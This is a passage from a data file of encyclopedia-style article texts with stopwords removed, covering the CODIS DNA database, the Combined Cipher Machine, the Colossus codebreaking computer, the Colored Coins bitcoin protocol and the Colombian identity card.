profiles convicted crimes; arrestee index, contains profiles arrested crimes pursuant laws particular state; forensic index, contains profiles collected crime scene. additional indexes, unidentified human remain index, missing persons index, biological relatives missing persons index, used assist identifying missing persons. specialty indexes also exist specimens fall categories. these indexes include staff index, profiles employees work samples, multi-allelic offender index, single-source samples three alleles loci. non-criminal indexes while codis generally used linking crimes crimes potentially suspects non-criminal portions database missing person indexes. national missing person database, also known codis(mp), maintained ndis level codis allowing states share information another. created 2000 using existing codis infrastructure, section database designed help identify human remains collecting storing information missing relatives missing individuals. unidentified remains processed university north texas center human identification funded national institute justice. nuclear, y-str (for males only), mitochondrial analysis performed unknown remains known relatives order maximize chance identifying remains. statistics september 2020, ndis contained million offender profiles, million arrestee profiles million forensic profiles. effectiveness codis measured number investigations aided database hits. september 2020, codis aided thousand investigations produced thousand hits. each state sdis database state inclusionary standards less strict national level. reason, number profiles present state level databases national database routinely searched across state lines. scientific basis bulk identifications using codis rely short tandem repeats (strs) scattered throughout human genome statistics used calculate rarity specific profile population. strs type copy-number variation comprise sequence nucleotide base pairs repeated again. location tested analysis, also known locus (plural loci), person sets repeats, father mother. each measured number repeat copies recorded. strands, inherited parents, contain number repeats locus person said homozygous locus. repeat numbers differ said heterozygous. every possible difference locus allele. this repeat determination performed across number loci repeat values profile uploaded codis. january 2017, requirements upload national level known offender profiles loci.alternatively, codis allows upload mitochondrial (mtdna) information missing persons indexes. since mtdna passed mother offspring used link remains still living relatives mtdna. loci prior january 2017, national level codis required known offender profiles loci called "codis core". since then, requirement expanded include seven additional loci. partial profiles also allowed codis separate indexes common crime scene samples degraded mixtures multiple individuals. upload profiles national level codis requires least eight core loci present well profile rarity million (calculated using population statistics).loci fall within gene named gene. example, tpox, named human thyroid peroxidase gene. loci fall within genes given standard naming scheme uniformity. these loci named chromosome locus order location chromosome described. example, d3s1358 third chromosome 1358th location described. codis core listed below; loci asterisks core added list january 2017. loci used codis chosen regions noncoding dna, sections code proteins. these sections able tell investigators additional information person hair color, race. however, advancements understanding genetic markers ancestry indicated codis loci contain phenotypic information. international while u.s. database directly connected country, underlying codis software used agencies around world. april 2016, codis software used international laboratories countries. international police agencies want search u.s. database submit request review. request reasonable profile searched would meet inclusionary standards u.s. profile, number loci, request searched national level forwarded states reasonable suspicion exists present level database. controversies arrestee collection original purpose codis database build upon offender registry collection convicted offenders. over time, expanded. currently, states collect convicted felonies. number states also collect samples juveniles well arrested, convicted, crime. note even states limit collection retained state database convicted crime, local databases, forensic laboratory operated york city's office chief medical examiner, collect samples arrestees convicted. collection arrestee samples raised constitutional issues, specifically fourth amendment prohibiting unreasonable search seizure. argued collection convicted crime, without explicit order collect, considered warrantless search therefore unlawful. 2013, united states supreme court ruled maryland king collection arrested crime, convicted, part police booking procedure reasonable collection used identification purposes. familial searching inheritance pattern means close relatives share higher percentage alleles other, random, members society. this allows searching close matches within codis exact match found. focusing close matches, investigators potentially find close relative whose profile codis narrowing search specific family. familial searching several convictions exhaustion leads including grim sleeper serial killer. this practice also raised fourth amendment challenges individual ends charged crime implicated someone else's codis database. april 2018, twelve states approved familial searching codis. also debbie smith gedmatch integrated automated fingerprint identification system (iafis) references external links codis page fbi.gov. accessed 2015. "aclu warns privacy abuses government plan expand databases". aclu. march 1999. perfect match, cbs, 2007 "dna prove anything, five points juror explains verdict double murder". november 2008.</t>
  </si>
  <si>
    <t>Combined Cipher Machine</t>
  </si>
  <si>
    <t>combined cipher machine (ccm) combined cypher machine) common cipher machine system securing allied communications world and, years after, nato. british typex machine mark modified interoperable. history british shown main cipher machine typex entry war, americans reluctant share machine, mark there need secure inter-allied communications, joint cipher machine adapted countries' systems developed navy. "combined cipher machine" approved october 1942, production began months later. requisite adapters, designed seiler, manufactured britain sufficient manufacturing resources time. initially used small scale naval november 1943, becoming operational armed services april 1944. adapter convert denoted asam army 1949) 1600 navy (the navy referred entire machine adapter 1700). adapter replacement rotor basket, could easily converted field. specially converted ecm, termed mark also made available britain canada. programme cost us$6 million. sigrod implementation which, point, proposed replacement mark (savard pekelney, 1999). typex mark later model typex cipher machine family adapted combined cipher machine. security while allied codebreakers much success reading equivalent german machine, lorenz cipher, german counterparts, although performing initial analysis, success ccm. however, security problems ccm. discovered certain rotor combinations produced dangerously short period 338; three-rotor enigma machine period 16,900. addition, rotor wiring could recovered 1,000-group message sent using machine.in 1952, later version ccm, "ajax", also found security problems. also kl-7 rotor-based cipher machine used 1950s 1960s references ralph erskine, "the admiralty cipher machines during second world war: stupid all", journal intelligence history, 2(2) (winter 2002). ralph erskine, "the development typex", enigma bulletin (1997): pp69–86. john savard richard pekelney, "the mark design, history cryptology", cryptologia, 23(3), july 1999, pp211–228. 1100(c), operating instructions mark (csp 888/889) mark (csp 1600), 1944, [1]. crypto-operating instructions asam 1949, [2]. external links combined cipher machine crypto museum website many photographs</t>
  </si>
  <si>
    <t>Colossus computer</t>
  </si>
  <si>
    <t>colossus computers developed british codebreakers years 1943–1945 help cryptanalysis lorenz cipher. colossus used thermionic valves (vacuum tubes) perform boolean counting operations. colossus thus regarded world's first programmable, electronic, digital computer, although programmed switches plugs stored program.colossus designed general post office (gpo) research telephone engineer tommy flowers solve problem posed mathematician newman government code cypher school (gc&amp;cs) bletchley park. alan turing's probability cryptanalysis (see banburismus) contributed design. sometimes erroneously stated turing designed colossus cryptanalysis enigma. (turing's machine helped decode enigma electromechanical bombe, colossus.)the prototype, colossus mark shown working december 1943 bletchley park early 1944. improved colossus mark used shift registers quintuple processing speed, first worked june 1944, time normandy landings d-day. colossi eleventh commissioned. bletchley park's machines allowed allies obtain vast amount high-level military intelligence intercepted radiotelegraphy messages german high command (okw) army commands throughout occupied europe. existence colossus machines kept secret mid-1970s. machines dismantled small parts could inferred. retained machines eventually dismantled 1960s. functioning rebuild mark colossus completed 2008 tony sale team volunteers; display national museum computing bletchley park. purpose origins colossus computers used help decipher intercepted radio teleprinter messages encrypted using unknown device. intelligence information revealed germans called wireless teleprinter transmission systems "sägefisch" (sawfish). this british call encrypted german teleprinter traffic "fish", unknown machine intercepted messages "tunny" (tunafish).before germans increased security operating procedures, british cryptanalysts diagnosed unseen machine functioned built imitation called "british tunny". deduced machine twelve wheels used vernam ciphering technique message characters standard 5-bit ita2 telegraph code. combining plaintext characters stream characters using boolean function produce ciphertext. august 1941, blunder german operators transmission versions message identical machine settings. these intercepted worked bletchley park. first, john tiltman, talented gc&amp;cs cryptanalyst, derived stream almost 4000 characters. then bill tutte, newly arrived member research section, used keystream work logical structure lorenz machine. deduced twelve wheels consisted groups five, named (chi) (psi) wheels, remaining called (mu) "motor" wheels. wheels stepped regularly letter encrypted, wheels stepped irregularly, control motor wheels. with sufficiently random keystream, vernam cipher removes natural language property plaintext message uneven frequency distribution different characters, produce uniform distribution ciphertext. tunny machine well. however, cryptanalysts worked examining frequency distribution character-to-character changes ciphertext, instead plain characters, departure uniformity provided system. this achieved "differencing" character xor-ed successor. after germany surrendered, allied forces captured tunny machine discovered electromechanical lorenz (schlüsselzusatzgerät, cipher attachment) in-line cipher machine.in order decrypt transmitted messages, tasks performed. first "wheel breaking", discovery patterns wheels. these patterns lorenz machine used fixed period time succession different messages. each transmission, often contained message, enciphered different start position wheels. alan turing invented method wheel-breaking became known turingery. turing's technique developed "rectangling", colossus could produce tables manual analysis. colossi "gadget" process.the second task "wheel setting", worked start positions wheels particular message could attempted patterns known. task colossus initially designed. discover start position wheels message, colossus compared character streams, counting statistics evaluation programmable boolean functions. streams ciphertext, read high speed paper tape, keystream, generated internally, simulation unknown german machine. after succession different colossus runs discover likely chi-wheel settings, checked examining frequency distribution characters processed ciphertext. colossus produced frequency counts. decryption processes using differencing knowing wheels advance character, tutte worked trying differenced bits (impulses) chi-stream differenced ciphertext would produce statistic non-random. this became known tutte's "1+2 break in". involved calculating following boolean function: {\displaystyle \delta z_{1}\oplus \delta z_{2}\oplus \delta \chi _{1}\oplus \delta \chi _{2}=\bullet counting number times yielded "false" (zero). number exceeded pre-defined threshold value known "set total", printed out. cryptanalyst would examine printout determine putative start positions likely correct chi-1 chi-2 wheels.this technique would applied pairs single, impulses determine likely start position five wheels. from this, de-chi ciphertext could obtained, component could removed manual methods. frequency distribution characters de-chi version ciphertext within certain bounds, "wheel setting" wheels considered achieved, message settings de-chi passed "testery". this section bletchley park major ralph tester bulk decrypting work done manual linguistic methods.colossus could also derive start position motor wheels, much done last months plenty colossi available number tunny messages declined. design construction colossus developed "newmanry", section headed mathematician newman responsible machine methods twelve-rotor lorenz sz40/42 on-line teleprinter cipher machine (code-named tunny, tunafish). colossus design arose prior project produced counting machine dubbed "heath robinson". although proved concept machine analysis part process, initially unreliable. electro-mechanical parts relatively slow difficult synchronise looped paper tapes, containing enciphered message, representing part keystream lorenz machine, also tapes tended stretch read 2000 characters second. tommy flowers senior electrical engineer head switching group post office research station dollis hill. prior work colossus, involved gc&amp;cs bletchley park february 1941 attempt improve bombes used cryptanalysis german enigma cipher machine. recommended newman alan turing, impressed work bombes. main components heath robinson machine follows. tape transport reading mechanism looped message tapes 1000 2000 characters second. combining unit implemented logic tutte's method. counting unit designed wynn-williams telecommunications research establishment (tre) malvern, counted number times logical function returned specified truth value.flowers brought design heath robinson's combining unit. impressed system tape kept synchronised message tape and, initiative, designed electronic machine eliminated need tape electronic analogue lorenz (tunny) machine. presented design newman february 1943, idea thousand thermionic valves (vacuum tubes thyratrons) proposed, could work together reliably, greeted great scepticism, robinsons ordered dollis hill. flowers, however, knew pre-war work thermionic valve failures occurred result thermal stresses power-up, powering machine reduced failure rates levels. additionally, heaters started voltage slowly brought full voltage, thermal stress reduced. valves could soldered-in avoid problems plug-in bases, could unreliable. flowers persisted idea obtained support director research station, gordon radley.flowers team fifty people switching group spent eleven months early february 1943 designing building machine dispensed second tape heath robinson, generating wheel patterns electronically. flowers used money project. this prototype, mark colossus, contained 1,600 thermionic valves (tubes). performed satisfactorily dollis hill december 1943 dismantled shipped bletchley park, delivered january re-assembled harry fensom horwood. operational january successfully attacked first message february 1944. large structure dubbed 'colossus', supposedly wrns operators. however, memo held national archives written newman january 1944 records 'colossus arrives today".during development prototype, improved design developed mark colossus. four ordered march 1944 april number order increased twelve. dollis hill pressure first working june. allen coombs took leadership production mark colossi, first containing 2,400 valves became operational 08:00 june 1944, time allied invasion normandy d-day. subsequently, colossi delivered rate month. time colossi working bletchley park start made assembling eleventh. main units mark design follows. tape transport 8-photocell reading mechanism. character fifo shift register. twelve thyratron ring stores simulated lorenz machine generating bit-stream wheel. panels switches specifying program "set total". functional units performed boolean operations. "span counter" could suspend counting part tape. master control handled clocking, start stop signals, counter readout printing. five electronic counters. electric typewriter.most design electronics work tommy flowers, assisted william chandler, sidney broadhurst allen coombs; erie speight arnold lynch developing photoelectric reading mechanism. coombs remembered flowers, produced rough draft design, tearing pieces handed colleagues detailed design team manufacture mark colossi five times faster simpler operate prototype.data input colossus photoelectric reading paper tape transcription enciphered intercepted message. this arranged continuous loop could read re-read multiple times internal storage data. design overcame problem synchronizing electronics speed message tape generating clock signal reading sprocket holes. speed operation thus limited mechanics reading tape. during development, tape reader tested 9700 characters second mph) tape disintegrated. 5000 characters/second ft/s (12.2 m/s; 27.3 mph)) settled speed regular use. flowers designed 6-character shift register, used computing delta function (δz) testing five different possible starting points tunny's wheels five processors. this five-way parallelism enabled five simultaneous tests counts performed giving effective processing speed 25,000 characters second. computation used algorithms devised tutte colleagues decrypt tunny message. operation newmanry staffed cryptanalysts, operators women's royal naval service (wrns) known "wrens" engineers permanently hand maintenance repair. staffing wrens men.the first operating colossus message prepare paper tape loop. this performed wrens stuck ends together using bostik glue, ensuring 150-character length blank tape start message. using special hand punch inserted start hole third fourth channels 2+1⁄2 sprocket holes blank section, stop hole fourth fifth channels 1+1⁄2 sprocket holes characters message. these read specially positioned photocells indicated message start ended. operator would thread paper tape gate around pulleys bedstead adjust tension. two-tape bedstead design carried heath robinson tape could loaded whilst previous run. switch selection panel specified "near" "far" tape.after performing various resetting zeroizing tasks, wren operators would, instruction cryptanalyst, operate "set total" decade switches panel switches desired algorithm. they would start bedstead tape motor lamp and, tape speed, operate master start switch. programming howard campaigne, mathematician cryptanalyst navy's op-20-g, wrote following foreword flowers' 1983 paper "the design colossus".my view colossus cryptanalyst-programmer. told machine make certain calculations counts, studying results, told another job. remember previous result, could acted upon did. colossus alternated interaction sometimes achieved analysis unusual german cipher system, called "geheimschreiber" germans, "fish" cryptanalysts. colossus stored-program computer. input data five parallel processors read looped message paper tape electronic pattern generators chi, motor wheels. programs processors held switches jack panel connections. each processor could evaluate boolean function count display number times yielded specified value "false" "true" pass message tape. input processors came sources, shift registers tape reading thyratron rings emulated wheels tunny machine. characters paper tape called characters tunny emulator referred greek letters bill tutte given working logical structure machine. selection panel, switches specified either either {\displaystyle \chi {\displaystyle \chi either {\displaystyle \psi {\displaystyle \psi data passed jack field switch panel'. these signals wheel simulators could specified stepping pass message tape not. switch panel group switches left-hand side specify algorithm. switches right-hand side selected counter result fed. plugboard allowed less specialized conditions imposed. overall switch panel switches plugboard allowed five billion different combinations selected variables. example: runs message tape might initially involve wheels, tutte's algorithm. such two-wheel called long run, taking average eight minutes unless parallelism utilised time factor five. subsequent runs might involve setting wheel, giving short taking minutes. initially, initial long run, choice next algorithm tried specified cryptanalyst. experience showed, however, decision trees iterative process could produced wren operators proportion cases. influence fate although colossus first electronic digital machines programmability, albeit limited modern standards, general-purpose machine, designed range cryptanalytic tasks, involving counting results evaluating boolean algorithms. colossus computer thus fully turing complete machine. however, university francisco professor benjamin wells shown colossus machines made rearranged specific cluster, entire computers could simulated universal turing machine, thus turing complete. notion computer general-purpose machine calculator devoted solving difficult specific problems become prominent world ii.colossus reasons construction highly secret remained years war. consequently, included history computing hardware many years, flowers associates deprived recognition due. colossi dismantled parts returned post office. some parts, sanitised original purpose, taken newman's royal society computing machine laboratory manchester university. tommy flowers ordered destroy documentation burnt furnace dollis hill. later said order: that terrible mistake. instructed destroy records, did. took drawings plans information colossus paper boiler fire. burn. colossi along replica tunny machines, retained, moved gchq's headquarters eastcote april 1946, gchq cheltenham 1952 1954. colossi, known colossus blue, dismantled 1959; 1960. there attempts adapt purposes, varying success; later years used training. jack good related first colossus war, persuading national security agency could used perform function planning build special-purpose machine. colossus also used perform character counts one-time tape test non-randomness.a small number people associated colossus—and knew large-scale, reliable, high-speed electronic digital computing devices feasible—played significant roles early computer work probably however, secret, little direct influence development later computers; edvac seminal computer architecture time. 1972, herman goldstine, unaware colossus legacy projects people alan turing (ace), newman (manchester computers) harry huskey (bendix g-15), wrote that, britain vitality could immediately embark many well-conceived well-executed projects computer field. professor brian randell, unearthed information colossus 1970s, commented this, saying that: opinion colossus project important source vitality, largely unappreciated, significance places chronology invention digital computer. randell's efforts started bear fruit mid-1970s, secrecy bletchley park broken group captain winterbotham published book ultra secret 1974. october 2000, 500-page technical report tunny cipher cryptanalysis—entitled general report tunny—was released gchq national public record office, contains fascinating paean colossus cryptographers worked regretted possible give adequate idea fascination colossus work; sheer bulk apparent complexity; fantastic speed thin paper tape round glittering pulleys; childish pleasure not-not, span, print main header gadgets; wizardry purely mechanical decoding letter letter (one novice thought hoaxed); uncanny action typewriter printing correct scores without beyond human aid; stepping display; periods eager expectation culminating sudden appearance longed-for score; strange rhythms characterizing every type run: stately break-in, erratic short run, regularity wheel-breaking, stolid rectangle interrupted wild leaps carriage-return, frantic chatter motor run, even ludicrous frenzy hosts bogus scores. reconstruction construction fully functional rebuild colossus mark undertaken 1993 2008 team tony sale. spite blueprints hardware destroyed, surprising amount material survived, mainly engineers' notebooks, considerable amount u.s. optical tape reader might posed biggest problem, arnold lynch, original designer able redesign original specification. reconstruction display, historically correct place colossus national museum computing, block bletchley park milton keynes, buckinghamshire. november 2007, celebrate project completion mark start fundraising initiative national museum computing, cipher challenge pitted rebuilt colossus radio amateurs worldwide first receive decode three messages enciphered using lorenz sz42 transmitted radio station dl0hnf heinz nixdorf museumsforum computer museum. challenge easily radio amateur joachim schüth, carefully prepared event developed signal processing code-breaking code using ada. colossus team hampered wish world radio equipment, delaying poor reception conditions. nevertheless, victor's laptop, running code, took less minute find settings wheels. german codebreaker said: laptop digested ciphertext speed million characters second—240 times faster colossus. scale frequency factor, equivalent clock colossus. that remarkable speed computer built 1944."the cipher challenge verified successful completion rebuild project. strength today's performance colossus good decades ago", commented tony sale. delighted produced fitting tribute people worked bletchley park whose brainpower devised fantastic machines broke ciphers shortened many months." other meanings there fictional computer named colossus 1970 film colossus: forbin project based 1966 novel colossus jones. this coincidence pre-dates public release information colossus, even name. neal stephenson's novel cryptonomicon (1999) also contains fictional treatment historical role played turing bletchley park. also history computing hardware list vacuum-tube computers manchester baby footnotes references further reading campaigne, howard; farley, robert february 1990), oral history interview: nsa-oh-14-83 campaigne, howard, june annopalis, robert farley (pdf), national security agency, retrieved october 2016 colossus: creating giant youtube short film made google celebrate colossus built particular tommy flowers. cragon, harvey (2003), from fish colossus: german lorenz cipher broken bletchley park, dallas: cragon books, isbn 0-9743045-0-6 detailed description cryptanalysis tunny, details colossus (contains minor errors) enever, (1999), britain's best kept secret: ultra's base bletchley park (3rd ed.), sutton publishing, gloucestershire, isbn 978-0-7509-2355-2 guided tour history geography park, written founder members bletchley park trust price, david june 2021). geniuses war; bletchley park, colossus, dawn digital age. york: knopf. isbn 978-0-525-52154-9. rojas, hashagen, (2000), first computers: history architectures, press, isbn 0-262-18197-5 comparison first computers, chapter colossus reconstruction tony sale. sale, tony (2004), colossus computer 1943–1996: helped break german lorenz cipher wwii, kidderminster: m.&amp;m. baldwin, isbn 0-947712-36-4 slender (20-page) booklet, containing material tony sale's website (see below) smith, michael (2007) [1998], station codebreakers bletchley park, grand strategy series (pan books ed.), london: macmillan ltd, isbn 978-0-330-41929-1 external links early computer development national museum computing (tnmoc) tnmoc: 75th anniversary first attack tony sale's codes ciphers contains great deal information, including: colossus, revolution code breaking lorenz cipher colossus machine comes fish codebreaking colossus rebuild project colossus rebuild project: evolving colossus walk around colossus detailed tour replica colossus make sure click "more text" links image informative detailed text part colossus ieee lecture transcript lecture tony sale gave describing reconstruction project news article reporting replica colossus news article: "colossus cracks codes more" news article: news article: "bletchley's code-cracking colossus" video interviews 2010-02-02 website copeland's 2006 book much information links recently declassified information manchester baby conceived bletchley park? walk video colossus rebuild bletchley park youtube online virtual simulation colossus</t>
  </si>
  <si>
    <t>Colored Coins</t>
  </si>
  <si>
    <t>colored coins open-source protocol built bitcoin allows users represent manipulate immutable digital resources bitcoin transactions. they class methods representing maintaining real-world assets bitcoin blockchain, used establish asset ownership. colored coins bitcoins mark specifies used for. colored coins also considered initial step toward nfts built bitcoin network.although bitcoins fungible, marked distinguished bitcoins. these marked coins specific features correspond physical assets like vehicles stocks, owners establish ownership physical assets. colored coins lower transaction costs complexity asset's owner transfer ownership quickly bitcoin transaction.colored coins commonly referred metacoins imaginative coloring addition metadata. this enables portion digital representation physical item encoded bitcoin address. value colored coins independent current prices bitcoin; instead, determined value underlying actual asset/service issuer's desire capacity redeem colored coins return equivalent actual asset service. history colored coins arose necessity generate tokens move assets bitcoin network. these tokens used represent asset world, including equities, commodities, real estate, fiat currency, even cryptocurrencies.yoni assia, etoro, first suggest colored coins article published march 2012. article titled bitcoin (aka colored bitcoin), assia claimed initial specifications bitcoins transmitted using "genesis transaction" protocol recognizable, distinctive, trackable ledger. idea growing, forums bitcointalk, concept colored coins started take form gain traction. this culminated meni rosenfeld releasing whitepaper detailing colored currencies december 2012.the next year, 2013, assia collaborated buterin others, lior hakim meni rosenfeld, write color coins bitcoinx, explored potential possibilities colored coins. development colored coins originated afterthought bitcoin miners. blockchain's data space utilized encode numerous metadata values. this unexpected data caused processing issues, causing network slow down. bitcoin team fixed problem including 40-byte area storing data transaction, well encrypted ledger transactions information coin's genesis.while bitcoin developed cryptocurrency, scripting language makes possible associate metadata individual transactions. precisely tracing origin particular bitcoin, possible distinguish group bitcoins others, process known bitcoin coloring term served basis name colored coins protocol).through oversight issuing agent public agreement, special properties associated colored bitcoins, giving value beyond currency's value. looking abstraction distinct layers bitcoin: lower layer referring transaction network based cryptographic technology upper layer constitutes distribution network values ​​encapsulated design colored coins.due fact colored coins implemented bitcoin infrastructure, allow atomic transactions (exchanged single transaction) transferred without involvement third party, enable decentralized exchange items would possible traditional means.to create colored coins, "colored" addresses must created stored "colored" wallets controlled color-aware clients coinprism, coloredcoins, colu, coinspark. "coloring" process abstract idea indicates asset description, general instructions symbol, unique hash associated bitcoin addresses.in 2013, flavien charlon, coinprism, developed colored coin protocol permitted generation colored currencies employing specified settings transaction inputs outputs. this bitcoin's first working colored coin protocol. this protocol, also known open assets protocol, open source integrated existing systems anyone.on july 2014, chromaway developed enhanced padded-order-based coloring protocol (epobc), simplified process manufacturing colored coins developers, first employ bitcoin script's return function.in 2015, colu created coloredcoins platforms colored coins protocol allowing users build digital assets bitcoin blockchain using bitcoin protocol. layers colored coins colored coin functions adding layer bitcoin blockchain. layer: network layer: consensus layer: transaction layer: watermark (color)before token standards created, concept using tokens represent monitor real-world items existed. colored coins original notion representing assets blockchain. they widely used transaction structure required represent colored coins relies unspent transaction outputs (utxo), ethereum-based blockchain systems support. primary concept attribute (the color) native transactions specify asset symbolizes. example, bitcoin blockchain, satoshi (the lowest potential value bitcoin) might represent separate item. this notion mostly used monitor ownership tokens and, extension, assets. there promise using colored coins effective tracing production situations since transactions merged divided transactions color readily altered transaction. finally, current tools, like blockchain explorers, make simple view analyze transactions.the nature colored coins makes first non-fungible tokens created bitcoin blockchain, albeit limited features. colored coins transferrable known atomic transactions. atomic transactions transactions permit direct peer-to-peer exchange token another single transaction. way, colored coins allow traditional assets decentralized. transactions colored coin uses open-source, decentralized peer-to-peer transaction protocol built 2.0. despite created protocol monetary transactions, bitcoin's advantages secure transaction protocol controlled central authority. this possible blockchain, maintains track bitcoin transactions worldwide. transaction consists inputs input transaction hash output index previous transaction carried bitcoin digital signature serves cryptographic proof input address authorizes transaction. output output bitcoin value transferred output script maps single address output. staining transferring manipulation colored coins performed several algorithms, create rules applied inputs outputs bitcoin transactions: given moment, digital resource associated output bitcoin transaction, called genesis transactions. output transaction (currency) belongs initial owner recorded system case jewelry store associating jewelry digital resources, newly colored coins belong store). when resource transferred sold, currency belongs previous owner consumed, colored currency created outgoing address transfer transaction. when necessary identify owner coin, enough evaluate transaction history coin genesis transaction last transaction unconsumed output. bitcoin blockchain tracking public keys associated address, owner coin prove ownership sending message private associated address.among algorithms, best known epobc. epobc algorithm colors coins inserting mark nsequence field first input transaction. important note nsequence field always present bitcoin transactions, used, generate overhead coloring process. examples companies driving epobc chromawallet, cuber, funderbeam. genesis transactions issue colors, necessary release coins color genesis transactions. general, cases consider genesis transactions: non-reissueable colors case, transaction inputs irrelevant algorithm, since transaction executed, coin issuer power them. matters genesis transaction itself. reissueable colors scenario, issuer must choose secure address “issuing address” transaction entry come address. second moment, issuer able issue units color genesis transactions secure address. important note address associated single color. once address emits reissueable color, longer able participate coloring coins colors, even non-reissueable colors. transfer transactions transfer transactions used send colored coins address another. also possible transfer coins mulctiple colors single transfer transaction. tagging-based coloring well-known algorithm operation. colored coins used input transactions follow transfer protocol, value associated color lost. furthermore, value also lost malformed transaction.there colored inputs transfer transaction. inputs need color, e.g. "gold" "silver" transferred within transaction, beneficial peer-to-peer trade. order inputs outputs within transaction, used non-ambiguous decoding. alternative coloring algorithms determining transfer colored coins bitcoin address another complex part colored coins protocol. transactions input output, easy determine color output coins color received input address, since bitcoin address handle single color value. however, transactions multiple inputs outputs, determining colored coins inputs correspond outputs become complex task. that, several algorithms propose solve problem, peculiarities. order based coloring first simplest coloring algorithm. intuitive understand algorithm consider transaction width proportional total input amount. left side inputs, width proportional value, right side outputs values proportional bitcoin values. assume, then, colored water flows straight line left right. color outlet color water arriving colorless multiple-color coins arrive outlet. single bitcoin address cannot handle coins different colors. padded order based coloring slightly complex algorithm (order based coloring) algorithm. essence, algorithm principle obc, however, treating output containing certain number colorless bitcoins, colored coins following them. first nfts, colored coins potential applications expanding metaverse.the metaverse term first used neal stephenson's 1992 science fiction novel, snow crash, describing virtual world humans exist avatars interact another. ideas surrounding metaverse evolved ever since.a metaverse characterized immersive shared virtual environment enables users, represented avatars, engage various activities. economic governance metaverse commerce aspects since virtual world economy currencies users trade object.a crypto metaverse, particular, metaverse includes blockchain underlying technology crypto assets, metaverse tokens, economy. metaverses incorporate accessible applications; hence, ecosystems include play-to-earn games markets exchange assets virtual properties (e.g. land parcels arts).colored coins like nfts digitally pure assets cannot replicated. result, one-of-a-kind non-fungible. this inherent feature enables nfts prove authenticity ownership various types items various fields, explains rapid expansion digital collectibles (e.g. trading cards, digital images, videos, virtual real estate), play-to-earn games metaverses.play-to-earn games built business concept consumers play game earning prizes. feature games users primarily rewarded types in-game assets including nfts variable scarcity (e.g., weapons, skins, monsters), purchased sold open market (e.g., opensea), specific type virtual currency. applications bitcoin network's decentralized nature indicates security need dependence trusted parties players operate anonymously provided adequate safeguards adopted. colored coins protocols adoption enables integration decentralized stock exchanges financial functionality bitcoin certifying credentials (like academic certificates), establishing existence digital documents. smart property: example, product rental company release colored coin represent products, car. through application, company could configure control message would send message signed private currently colored coin. way, users could transfer vehicle's digital other, transferring currency. this protocol feature used land management indicating ownership piece land single several tokens. token's information used maintain public registry parameters size, locations, year created, land administrator encrypt ownership details titles identification individuals right private information. anyone internet connection publicly verify trace ownership token using block explorer software. issue shares: company issue shares colored coins, taking advantage bitcoin infrastructure manage activities voting, exchange payment dividends. colored coins also used form distributed collaborative organizations (dcos) decentralized autonomous organizations (daos), acting virtual corporations shareholders. cases, blockchain assist keeping track company's ownership structure well creating distributing shares transparent safe manner. examples: community currency corporate currency, deposit representation, access subscription services. issue coupons: company issue promotional coupons loyalty points among customers form colored coins. digital collectibles: decentralized management digital resources. similar collectors acquire sell paintings, colored coins enable managing digital resources similar way, e-books, music, digital games software, guaranteeing ownership resource owner coin.as long provider's identity protected legal framework, colored coins used transfer digitally transferable right. circulation based cryptographic signature. contract payments linked recorded blockchain using unique cryptographic identifies rightful owner currency. parties alias sign protocol legally permissible circumstances. reality, secret cryptographic enables system validate subscribers' digital identities without disclosing personal information.private holders might transfer asset directly persons corporations public blockchain. deterministic contracts: person company issue contracts pre-scheduling payment, stock options. bonds: special case deterministic contract, bonds issued payment amount installment schedule bitcoin, another currency commodity. decentralized digital representation physical resources: means tying physical resources, physical objects, commodities, traditional currencies, digital resources proving ownership objects way. tokens approach, selling ownership artworks even living properties. сolored coin wallet colored coins handled wallets manner bitcoin monetary resources managed bitcoin wallets. wallets used manage addresses associated pair keys (public private) bitcoin user, well transactions associated addresses. rather dealing cryptocurrencies, colored coin wallets layer abstraction, managing digital assets, stocks, altcoins, created blockchain, intellectual property resources. while bitcoin wallets required unique bitcoin address transaction, colored coin wallets frequently reuse addresses order re-issue coins color. issue colored coins, colored addresses must generated stored colored wallets administered color-aware client coinprism. legal aspects smart property item off-chain identifier transferred blockchain remains subject legal interpretation. colored coins virtual currency presently recognized evidence ownership government agency united states. financial institutions, lack identifiable identity across on-and off-chain settings still barrier.there's legal challenge regard transfer common stock ownership using blockchain. fact rights receive notifications, vote, receive dividends, exercise appraisal rights restricted registered owners, establishing ownership likely even critical blockchain stock.due extralegal nature colored coin transactions nfts, frequently result informal exchange ownership item legal basis enforcement, frequently conferring nothing usage status symbol. limitations virtual tokens colored coins cannot compel real world meet obligations made issued. they represent something external, actual world, corporate action debt repayment obligation. this suggests issued person entity, carries level risk. that issuer comply related obligations even fraud currencies represent anything actual. they unable prevent user changing underlying cryptocurrency destroys extra information. using virtual tokens transaction conform rules colored currencies (stricter rules blockchain transactions mandated destroys additional meaning, leaving token’s monetary worth blockchain. impossible store semantics information indicating token represents. instance, blockchain record number concert tickets issued addresses owners, cannot encode fact represent allowed access specific concert specific time. metadata storage processing require external system, open-transactions. open-transactions free software library implements cryptographically secure financial transactions using financial cryptographic primitives. utilized issue stocks, dividends, purchase sell shares, etc. speed transactions capabilities smart contract procedures utilized virtual tokens equivalent blockchain based nature bitcoin host network, adding additional layer neither simple scalable. additionally, inherits information security safety concerns host blockchain. developing comprehensive protocol incorporates asset issuance native tracking rigorous scalable method creating blockchain-based asset-tracking system. concerns opposition colored coins treatment abstracted resources bitcoin mainly originates financial banking sectors. argued proof-of-work blockchain-based security system cannot exported regulated financial resolution environment. result, legal framework colored coins' transactions. finally, regulatory concerns coin coloring method. according institutions criticize decentralized transaction system, legal effect individual entity transferring ownership given object another individual entity bitcoin abstractions still uncertain. also bitcoin blockchain digital currencies non-fungible token bitcoin network smart contract altcoins references</t>
  </si>
  <si>
    <t>Colombian identity card</t>
  </si>
  <si>
    <t>colombian identity card (spanish: documento identidad colombiano, pronounced [do.kuˈmen.to i.ðen̪.tiˈðað ko.lomˈbja.no], also known cédula ciudadanía) identity document issued colombian citizens local registry offices colombia diplomatic missions abroad every colombian person years age, since minors "tarjeta identidad.” this valid identification document civil, political, administrative judicial acts according colombian 1961. they produced issued national civil registry. history november 1952, first citizenship certificate issued president republic, laureano gómez castro, number later, 1954, women able exercise right elect elected. first female identity card issued 1956, doña carola correa rojas pinilla, wife president colombia, general gustavo rojas pinilla, number 20,000,001. this document so-called "blanca laminada.” 1993 brown laminated identification card produced. information previous identification card skin color signs eliminated, information blood type, citizen's barcode added. since 2000, identity document "amarilla hologramas" (yellow holograms) produced, based afis (automated fingerprint identification identification system) technology. along format, others circulated (white brown), either recognized legitimate means citizen identification. 2003, format (personal identification number) changed. previously, person identity card number later assigned different upon turning aforementioned year, alphabetical complement identity card number began used. later, 2004, system changed nuip (unique personal identity number) identifies single citizen throughout life; numbering begins number 1.000.000.000. citizens issued identity card 2003 kept 